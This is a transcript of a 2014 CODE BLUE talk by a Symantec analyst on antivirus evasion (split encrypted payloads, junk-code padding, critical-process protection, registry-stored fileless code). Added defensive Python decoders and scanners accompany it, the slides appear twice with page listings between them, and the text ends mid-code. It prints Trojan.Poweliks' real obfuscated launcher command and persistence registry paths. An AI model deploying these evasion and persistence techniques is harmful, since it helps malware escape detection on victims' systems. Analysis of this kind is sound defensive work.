How malware avoids Anti-Virus scanning

Hiroshi Shinotsuka
Threat Analysis Engineer
Self-introduction

Copyright © 2014 Symantec Corporation

•  Threat analysis engineer at Symantec.
•  Analyze suspicious files and create Anti-Virus signatures
•  Provide detailed technical descriptions to customers on demand
•  Publicly provide malware-related information
24 hours x 365 days

Attacker's techniques to avoid detection

1  Store decryption key and data in separate files
2  Large amount of junk code
3  Process protection
4  Store malicious code outside of files (fileless malware)
Trojan.Blueso detection

[Chart: Trojan.Blueso detection count by month, August through November; vertical axis 0 to 35,000]
  
Trojan.Blueso file structure

RAR self-extracting file (13 MB) containing:
•  AutoIt executable file
•  Decryption code (script file)
•  Decryption key (configuration file)
•  Encrypted code

AutoIt is a programming language for the Microsoft Windows platform. The AutoIt syntax is very similar to that of the BASIC programming language, and it is designed to automate the Windows GUI.

The RAR self-extracting file drops the 4 files, then executes the AutoIt script. The decrypted code is Backdoor.Trojan, which Blueso injects into a process.
  
[Diagram: the AutoIt executable holds the code, the decryption key and the encrypted code. After decryption, part of the decrypted code is injected into a legitimate Windows process, which injects the decrypted code into an Internet Explorer process.]

Watch Dog monitor

[Diagram: file deleted -> create file; process deleted -> create process and inject.]

Trojan.Blueso creates the file, registry entry and process again if antivirus deletes them.
Technique 1: Store decryption key and data in separate files
Traditional sample

Packer / Self update

•  Harder to detect encrypted files.
•  A traditional sample stored all information in a single file.

[Diagram: one file holding the code, the decryption key and the encrypted code; at run time the code in the same file decrypts it into the decrypted malicious code.]
New technique to avoid detection

Traditionally, malware saved its decrypted image to a file and executed it. The antivirus scanner detects the malware when the malware saves its decrypted image onto the disk.

The new technique is to inject the decrypted image into a newly started process and execute it there, in order to avoid detection by the file scan.

[Diagram: the AutoIt executable (code, decryption key, encrypted code) decrypts in memory and injects the decrypted malicious code into a legitimate Windows process.]
File detail

[Diagram: the code, the decryption key and the encrypted code as separate files.]

Antivirus scanner scans each file.

Why the attacker split the malware into four separate files

[Diagram: AutoIt executable, decryption code, decryption key (setting file), encrypted code; each file is scanned on its own.]
What does this mean?

•  Hiding malicious code by encrypting it
•  Store the code, the decryption key and the encrypted code in separate files.
•  Antivirus scanner can't determine the 'encrypted code' to be a malicious file.
•  Antivirus scanner can't detect the file without understanding the relationships between multiple files.
Technique 2: Large amount of junk code
Code (beginning of file)

The TAB character is replaced with a 1-byte string.
You only see junk comment lines!
Code (Sample 1)

Code (Sample 2)

Code

Finally, at line 23670 of the 16 MB script, the important code is reached.
87,476 lines of AutoIt script code. Only 900 lines without the comment lines. Only 1% is important code.
Antivirus scan method

•  Antivirus scanner needs to balance detection and performance.
•  Antivirus scanner first determines the file type and starts the file scan based on the detected file type.

[Diagram: an executable file, a ZIP file and a JPEG file each have a recognizable header; there is no special file structure in a text file/script file.]

Script files have no file header, which means the files have no special file structure.
Antivirus scanner needs to run a partial scan and determine what the file is.
It is very difficult to keep scan performance if a malicious script has so much comment/junk code.
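The two steps the scan-method slides describe, in working code: dispatching on the file header, and a pre-pass that removes an AutoIt script's comment and block-comment lines so the signature engine only has to look at the 1% that actually runs. Added example in Python, not code from the talk or from any antivirus engine; the magic-number table and AutoIt's comment syntax (';' line comments, #cs/#comments-start ... #ce/#comments-end blocks) are standard, and the sample script is constructed for the example.

```python
"""File-type dispatch by header, and junk stripping for a headerless
AutoIt script before it is scanned.

Added example, not code from the talk or from any antivirus engine.
The sample script below is constructed.
"""
import re

# Header-based dispatch: the scanner's first, cheap decision.
MAGIC = [
    (b"MZ", "executable"),
    (b"PK\x03\x04", "zip"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"Rar!\x1a\x07", "rar"),
]


def classify(data: bytes) -> str:
    """Return a file type from the leading bytes, or 'text' when there is
    no header to dispatch on (the script-file case)."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    head = data[:512]
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in head)
    return "text" if head and printable / len(head) > 0.95 else "unknown"


_BLOCK_START = re.compile(r"^\s*#(cs|comments-start)\b", re.I)
_BLOCK_END = re.compile(r"^\s*#(ce|comments-end)\b", re.I)


def _cut_line_comment(line: str) -> str:
    """Remove a trailing ';' comment, ignoring ';' inside quoted strings."""
    quote = None
    for i, ch in enumerate(line):
        if quote:
            if ch == quote:
                quote = None
        elif ch in ('"', "'"):
            quote = ch
        elif ch == ";":
            return line[:i].rstrip()
    return line


def strip_autoit_junk(src: str) -> list:
    """Drop block comments, ';' comments and blank lines; return only the
    lines the AutoIt interpreter would actually execute."""
    code, in_block = [], False
    for raw in src.splitlines():
        line = raw.replace("\t", " ").strip()
        if in_block:
            in_block = not _BLOCK_END.match(line)
            continue
        if _BLOCK_START.match(line):
            in_block = True
            continue
        line = _cut_line_comment(line)
        if line:
            code.append(line)
    return code


def junk_ratio(src: str) -> float:
    """Fraction of the script's lines that carry no code at all."""
    total = len(src.splitlines())
    return 0.0 if total == 0 else 1 - len(strip_autoit_junk(src)) / total


# Constructed sample: 6 real statements buried in 200 junk lines.
SAMPLE = (
    "\n".join(f"; junk {i}: nothing to see here" for i in range(100))
    + "\n#cs\n" + "\n".join("random filler text" for _ in range(100)) + "\n#ce\n"
    + '$k = FileRead("settings.ini")  ; key lives in the config file\n'
    + '$d = FileRead("data.bin")\n'
    + '$s = "a;b"  ; a semicolon inside a string must survive\n'
    + "Local $p = _Decrypt($d, $k)\n"
    + "\t_InjectIntoProcess($p)\n"
    + "Exit\n"
)

if __name__ == "__main__":
    print(classify(SAMPLE.encode()))
    for stmt in strip_autoit_junk(SAMPLE):
        print(stmt)
    print(f"junk ratio: {junk_ratio(SAMPLE):.1%}")
```

The pre-pass is what makes the 87,476-line case affordable: the engine still has to read the whole file once, but the content handed to signature matching shrinks to the handful of statements that do the work.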
Technique 3: Process protection
How does Blueso start and protect itself?

[Diagram: AutoIt executable (code, decryption key, encrypted code) -> decryption -> legitimate Windows process -> Internet Explorer process. The Internet Explorer process: Malware!! The legitimate Windows process and the AutoIt executable: Malware?? What is wrong??]
Process protection mechanism

1)  Terminate Internet Explorer
    -> The malicious code injected into the legitimate Windows process executes it again
2)  Terminate the legitimate Windows process
    -> The script running in AutoIt executes it again
3)  Terminate AutoIt?
    -> The AutoIt executable is marked as an essential process for the Windows system by using the undocumented API NtSetInformationProcess.
    As soon as AutoIt is terminated, Windows treats it as an unrecoverable critical problem.
    -> Blue Screen Of Death!!
Technique 4: Store malicious code outside of files (fileless malware)
Example of malware storing code/data in an irregular place (Bamital)

Set a registry entry to start code when Windows restarts:

HKEY_LOCAL_MACHINE\system\CurrentControlSet\Control\Session Manager\AppCertDlls\"AppSecDll" = "%USER_Profile%\Local Settings\Application Data\Windows Server\xblscp.dll"

Because of the analysis already performed, xblscp.dll is determined to be a malicious file.
Strictly speaking, does this file have malicious code in it?
Example of malware storing code/data in an irregular place (Bamital) 2

How it works
•  Allocate memory
•  Store data from the registry into the allocated memory
•  Call the allocated memory

Antivirus scanner does not know the data rule. The data is written in the registry.
Other malware uses the same technique with a file instead of the registry.
Example of malware storing code/data in an irregular place (Poweliks)

Trojan.Poweliks writes a Windows PowerShell script to the registry.
You can see that this registry entry executes encoded JavaScript.
The encoded code that it decodes is stored in a different registry entry.

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default) =
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return String.fromCharCode(_.charCodeAt()-1);}))

"a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@
  
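Decoding the value above by hand: the slide's JavaScript shifts every character of the eval'd string down by one code point (String.fromCharCode(c - 1)). The Python below is an added example, not code from the talk or from Symantec: it applies that shift to the string shown on the slide, extracts the registry value the decoded script reads with RegRead (the "a" value that carries the JScript.Encode payload), and adds a simple heuristic for flagging a LocalServer32 value that launches rundll32 with a javascript: URL. The heuristic and the function names are this example's assumptions.

```python
"""Decode the obfuscated JavaScript in Poweliks' LocalServer32 value and
pull out the registry value it loads the next stage from.

Added example, not code from the talk or from Symantec. LAUNCHER is the
registry value shown on the slide; the decoding rule is the slide's own
(each character shifted down by one). The detection heuristic is mine.
"""
import re

# (Default) value of ...\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32
LAUNCHER = (
    'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";'
    'eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)'
    '(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]'
    'mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return '
    'String.fromCharCode(_.charCodeAt()-1);}))'
)


def shift_decode(obfuscated: str, delta: int = -1) -> str:
    """Apply the slide's String.fromCharCode(c - 1) transform."""
    return "".join(chr(ord(c) + delta) for c in obfuscated)


def extract_eval_payload(cmdline: str):
    """Return the string literal handed to eval("...").replace, or None."""
    m = re.search(r'eval\("((?:[^"\\]|\\.)*)"\.replace', cmdline)
    return m.group(1) if m else None


def decode_launcher(cmdline: str):
    """Decode the eval'd JavaScript inside a Poweliks-style launcher."""
    payload = extract_eval_payload(cmdline)
    return shift_decode(payload) if payload else None


def referenced_registry_value(decoded_js: str):
    """Registry path inside RegRead('...'), with the JavaScript string
    literal's doubled backslashes collapsed to single ones."""
    m = re.search(r"RegRead\('([^']+)'\)", decoded_js)
    return m.group(1).replace("\\\\", "\\") if m else None


def is_suspicious_localserver32(value: str) -> bool:
    """Heuristic (this example's, not the slide's): a COM LocalServer32
    that starts rundll32 on a javascript: URL with RunHTMLApplication is
    not how a legitimate COM server is registered."""
    v = value.lower()
    return "rundll32" in v and "javascript:" in v and "runhtmlapplication" in v


if __name__ == "__main__":
    js = decode_launcher(LAUNCHER)
    print(js)
    print("next stage in:", referenced_registry_value(js))
    print("suspicious:", is_suspicious_localserver32(LAUNCHER))
```

The decoded script writes a `<script language=jscript.encode>` element whose body is read from HKCR\clsid\{73e709ea-5d93-4b2e-bbb0-99b7938da9e4}\localserver32\a, which is the "a" value on the slide: the launcher in the registry contains no payload itself, so neither file scanning nor scanning the launcher value alone sees the code that eventually runs.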
Conclusion

•  Attackers discover new techniques every day.
•  Attackers employ techniques to make malware removal difficult.
•  File-based scanning is no longer effective.
•  Multi-layered security is becoming more important.

Q & A

Thank you!
Copyright © 2014 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.

This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.

Hiroshi Shinotsuka

CODE BLUE 2014
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 

Recently uploaded

A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 

Recently uploaded (20)

A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 

CODE BLUE 2014: How malware avoids Anti-Virus scanning, by Hiroshi Shinotsuka (slide transcript)

Slide 1: How malware avoids Anti-Virus scanning
Hiroshi Shinotsuka, Threat Analysis Engineer

Slide 2: Self-introduction
Copyright © 2014 Symantec Corporation
• Threat analysis engineer at Symantec.
• Analyze suspicious files and create Anti-Virus signatures.
• Provide detailed technical descriptions to customers on demand.
• Publicly provide malware-related information.

Slide 3: 24 hours x 365 days

Slide 4: Attacker's techniques to avoid detection
1. Store the decryption key and the data in separate files
2. Large amount of junk code
3. Process protection
4. Store malicious code outside of files (fileless malware)

Slide 5: Trojan.Blueso detections
[Bar chart: Trojan.Blueso detections per month, August to November; y-axis 0 to 35,000]

Slide 6: Trojan.Blueso file structure
RAR self-extracting file, 13 MB, containing:
• AutoIt executable file
• Decryption code (script file)
• Decryption key (configuration file)
• Encrypted code
The RAR self-extracting file drops the four files, then executes the AutoIt script.
AutoIt is a programming language for the Microsoft Windows platform. Its syntax is very similar to that of the BASIC programming language, and it is designed to automate the Windows GUI.

Slide 7: Blueso injects Backdoor.Trojan
[Diagram: the AutoIt executable loads the code, the decryption key and the encrypted code; after decryption, the decrypted code is injected into a legitimate Windows process, and part of it is injected from there into an Internet Explorer process.]

Slide 8: Watchdog monitor
[Diagram: Create Process / Inject / Create File, with "File deleted" and "Process deleted" events feeding back into the loop.]
Trojan.Blueso recreates its file, registry entry and process if the antivirus deletes them.

Slide 9: Attacker's techniques to avoid detection (agenda; technique 1: store the decryption key and the data in separate files)

Slide 10: Traditional sample
Packer / self-update
• Encrypted files are harder to detect.
• A traditional sample stored all of its information in a single file.
[Diagram: one file holding code, decryption key and encrypted code; after decryption, code plus decrypted malicious code.]

Slide 11: New technique to avoid detection
Traditionally, malware saved its decrypted image to a file and executed it. The antivirus scanner detects the malware when it saves the decrypted image onto the disk.
The new technique is to decrypt in memory and inject the decrypted image into a newly started process, which executes it, in order to avoid detection by the file scan.
[Diagram: AutoIt executable with code, decryption key and encrypted code; decrypt in memory; decrypted malicious code running inside a legitimate Windows process.]

Slide 12: File detail
[Screenshot: code, decryption key, encrypted code]

Slide 13: Why the attacker split the malware into four separate files
The antivirus scanner scans each file on its own: the AutoIt executable (scan), the decryption code (scan), the decryption key / setting file (scan) and the encrypted code (scan).

Slide 14: What does this mean?
• Hide the malicious code by encrypting it.
• Store the code, the decryption key and the encrypted code in separate files.
• The antivirus scanner cannot determine that the 'encrypted code' file is malicious.
• The antivirus scanner cannot detect the file without understanding the relationships between multiple files.
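The argument of slides 10 to 14, as an added example that is not part of the original presentation: a byte-signature scanner is run over each dropped file separately, and then over the blob after the sibling key file has been applied to it. Everything in it is constructed for the illustration: the file names, the XOR "cipher" (the slides do not say what Blueso's script actually uses), the key, the payload bytes and the signature string.

```python
"""Why scanning each dropped file on its own misses a split payload.

Added example, not code from the presentation. It models the Blueso layout
from the slides (interpreter, decryption script, key/config file, encrypted
blob) with a constructed payload and a constructed XOR cipher standing in
for whatever the real script used. A plain byte-signature scanner is run
first over each file separately, then over the result of combining the key
file with the encrypted file.
"""
from itertools import cycle

# Constructed: the byte sequence our toy scanner treats as "known malicious".
SIGNATURES = {
    "Backdoor.Trojan": b"CreateRemoteThread",
}

# Constructed stand-in for the decrypted payload that ends up injected.
PAYLOAD = b"MZ...payload calls CreateRemoteThread into iexplore.exe..."


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """Symmetric XOR with a repeating key (assumption; the real cipher is not on the slides)."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def build_dropped_files(key: bytes) -> dict:
    """The four files the RAR SFX drops, in the roles the slides describe."""
    return {
        "autoit.exe": b"MZ" + b"\x00" * 64,                  # legitimate interpreter
        "script.au3": b"; junk\n$k = FileRead('key.cfg')\n",  # decryption logic
        "key.cfg": key,                                       # key, separate file
        "payload.dat": xor_crypt(PAYLOAD, key),               # encrypted code
    }


def scan_bytes(data: bytes) -> list:
    """Return the names of the signatures found in one buffer."""
    return [name for name, sig in SIGNATURES.items() if sig in data]


def scan_each_file(files: dict) -> dict:
    """Per-file scan: what a file-based scanner does with each dropped file."""
    return {name: scan_bytes(content) for name, content in files.items()}


def scan_with_relationship(files: dict) -> list:
    """Relationship-aware scan: apply the sibling key file to the blob, then scan."""
    decrypted = xor_crypt(files["payload.dat"], files["key.cfg"])
    return scan_bytes(decrypted)


if __name__ == "__main__":
    files = build_dropped_files(b"s3cr3t")
    print(scan_each_file(files))          # every file: []
    print(scan_with_relationship(files))  # ['Backdoor.Trojan']
```

The per-file pass returns nothing for all four files because no single file contains the signature bytes; only the pass that knows `key.cfg` belongs to `payload.dat` sees the payload. That is the relationship a file scanner has no way to learn from the files alone.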
Slide 15: Attacker's techniques to avoid detection (agenda; technique 2: large amount of junk code)

Slide 16: Code (beginning of file)
[Screenshot of the script; in the listing each TAB character is replaced with a one-byte string.]
You only see junk comment lines!

Slide 17: Code (sample 1)
[Screenshot]

Slide 18: Code (sample 2)
[Screenshot]

Slide 19: Code
Finally, at line 23670, 16 MB into the file, the important code is reached.
87476 lines of AutoIt script code; only 900 lines without the comment lines. Only 1% is important code.

Slide 20: Antivirus scan method
• An antivirus scanner needs to balance detection against performance.
• An antivirus scanner first determines the file type and then starts a file scan suited to the detected type (executable file, ZIP file, JPEG file, ...).

Slide 21: No special file structure in text files / script files
Script files have no file header, which means the files have no special file structure.
The antivirus scanner needs to run a partial scan to determine what the file is.
It is very difficult to keep scan performance if a malicious script contains so many comment/junk lines.
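A triage check for the padding described on slides 16 to 21, as an added example (not code from the presentation): it strips AutoIt comments and reports what fraction of a script is real code. AutoIt uses `;` for line comments and `#cs`/`#ce` (or `#comments-start`/`#comments-end`) for block comments. The sample script embedded below is constructed for the example; it is not the Blueso script.

```python
"""Estimate how much of an AutoIt script is real code versus comment padding.

Added example, not code from the original presentation. It strips AutoIt
line comments (';' to end of line, outside quoted strings) and block
comments (#cs/#ce or #comments-start/#comments-end) and reports the
code-to-total ratio the slides talk about (about 1% for the Blueso
sample). SAMPLE below is a constructed script with the same shape:
a few lines of real code buried under comment lines.
"""
import re

BLOCK_START = re.compile(r"^\s*#(cs|comments-start)\b", re.IGNORECASE)
BLOCK_END = re.compile(r"^\s*#(ce|comments-end)\b", re.IGNORECASE)


def strip_line_comment(line: str) -> str:
    """Drop a ';' comment, ignoring ';' characters inside quoted strings."""
    quote = None
    for i, ch in enumerate(line):
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == ";":
            return line[:i]
    return line


def code_lines(script: str):
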